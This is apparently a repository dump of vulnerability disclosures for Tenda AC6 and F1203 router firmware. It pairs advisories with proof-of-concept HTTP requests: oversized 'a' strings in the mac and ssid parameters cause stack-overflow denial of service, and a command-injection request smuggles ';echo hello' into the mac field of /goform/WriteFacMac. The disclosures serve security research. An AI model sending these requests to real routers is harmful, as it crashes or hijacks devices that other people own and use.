time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | * Manufacturer's address: https://www.tenda.com.cn/ 6 | 7 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 8 | 9 | ## Affected version 10 | 11 | ![](images/01.png) 12 | 13 | ## Vulnerability details 14 | 15 | This vulnerability lies in the `/goform/WifiBasicSet` page,While processing the `security` parameters for a post request, the value is directly `strcpy` to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow. The details are shown below: 16 | 17 | ![image-20221117163921726](images/04.png) 18 | 19 | ![image-20221117162857193](images/3.png) 20 | 21 | ![image-20221117162540617](images/02.png) 22 | 23 | ## POC 24 | 25 | This PoC can result in a Dos. 26 | 27 | ![image-20221117164219291](images/05.png) 28 | 29 | 30 | 31 | ![image-20221117164300400](images/06.png) -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/01.png -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/02.png -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/04.png -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/05.png -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/06.png -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6v1.0_vuln/images/3.png -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/GetParentControlInfo.md: -------------------------------------------------------------------------------- 1 | # Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mac parameter in the GetParentControlInfo function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/GetParentControlInfo` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2494.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221201234503984](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/GetParentControlInfo` page,The details are shown below: 20 | 21 | ![image-20221201235217239](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/GetParentControlInfo HTTP/1.1 29 | Host: 192.168.204.143 30 | Cache-Control: max-age=0 31 | Upgrade-Insecure-Requests: 1 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 34 | Accept-Encoding: gzip, deflate 35 | Accept-Language: zh-CN,zh;q=0.9 36 | Cookie: user=admin 37 | Connection: close 38 | Content-Length: 2055 39 | 40 | mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 41 | ``` 42 | 43 | ![image-20221201234916364](images/03.png) -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceId/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceMac/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceMac/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceMac/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceMac/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceMac/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/addWifiMacFilter_deviceMac/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_deviceId/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeed/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeed/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeed/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeed/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeed/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeed/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeedUp/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeedUp/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeedUp/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeedUp/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formSetClientState_limitSpeedUp/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetClientState_limitSpeedUp/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formSetSpeedWan/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetSpeedWan/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formSetSpeedWan/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetSpeedWan/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formSetSpeedWan/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formSetSpeedWan/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security _5g/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security _5g/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security _5g/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security _5g/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security _5g/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security _5g/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formWifiBasicSet_security/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWifiBasicSet_security/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formWriteFacMac/formWriteFacMac.md: -------------------------------------------------------------------------------- 1 | # Tenda F1203 V2.0.1.6 was found to contain a command injection vulnerability in formWriteFacMac 2 | 3 | ## Description 4 | 5 | `Tenda` Router **F1203 V2.0.1.6** was found to contain a command injection vulnerability in `formWriteFacMac`.This vulnerability allows an attacker to execute arbitrary commands through the "mac" parameter. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2494.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221201234503984](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/WriteFacMac` page,The details are shown below: 20 | 21 | ![image-20221202010903295](images/02.png) 22 | 23 | ## POC 24 | 25 | 26 | ``` 27 | POST /goform/WriteFacMac HTTP/1.1 28 | Host: 192.168.204.143 29 | Cache-Control: max-age=0 30 | Upgrade-Insecure-Requests: 1 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 32 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 33 | Accept-Encoding: gzip, deflate 34 | Accept-Language: zh-CN,zh;q=0.9 35 | Cookie: user=admin 36 | Connection: close 37 | Content-Length: 4110 38 | 39 | mac=00:01:02:11:22:33;echo%20hello 40 | ``` 41 | -------------------------------------------------------------------------------- /tenda_f1203/formWriteFacMac/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWriteFacMac/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formWriteFacMac/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formWriteFacMac/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/form_fast_setting_wifi_set/form_fast_setting_wifi_set.md: -------------------------------------------------------------------------------- 1 | # Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/fast_setting_wifi_set` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2494.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221201234503984](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/fast_setting_wifi_set` page,The details are shown below: 20 | 21 | ![image-20221201234851524](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/fast_setting_wifi_set HTTP/1.1 29 | Host: 192.168.204.143 30 | Cache-Control: max-age=0 31 | Upgrade-Insecure-Requests: 1 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 34 | Accept-Encoding: gzip, deflate 35 | Accept-Language: zh-CN,zh;q=0.9 36 | Cookie: user=admin 37 | Connection: close 38 | Content-Length: 2056 39 | 40 | ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 41 | ``` 42 | 43 | ![image-20221201234916364](images/03.png) -------------------------------------------------------------------------------- /tenda_f1203/form_fast_setting_wifi_set/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/form_fast_setting_wifi_set/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/form_fast_setting_wifi_set/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/form_fast_setting_wifi_set/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/form_fast_setting_wifi_set/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/form_fast_setting_wifi_set/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/formexeCommand/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formexeCommand/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/formexeCommand/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formexeCommand/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/formexeCommand/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/formexeCommand/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_entrys/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_entrys/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_entrys/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_entrys/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_entrys/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_entrys/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_mitInterface/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_mitInterface/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_mitInterface/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_mitInterface/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_mitInterface/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_mitInterface/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_page/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_page/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_page/images/02.png: 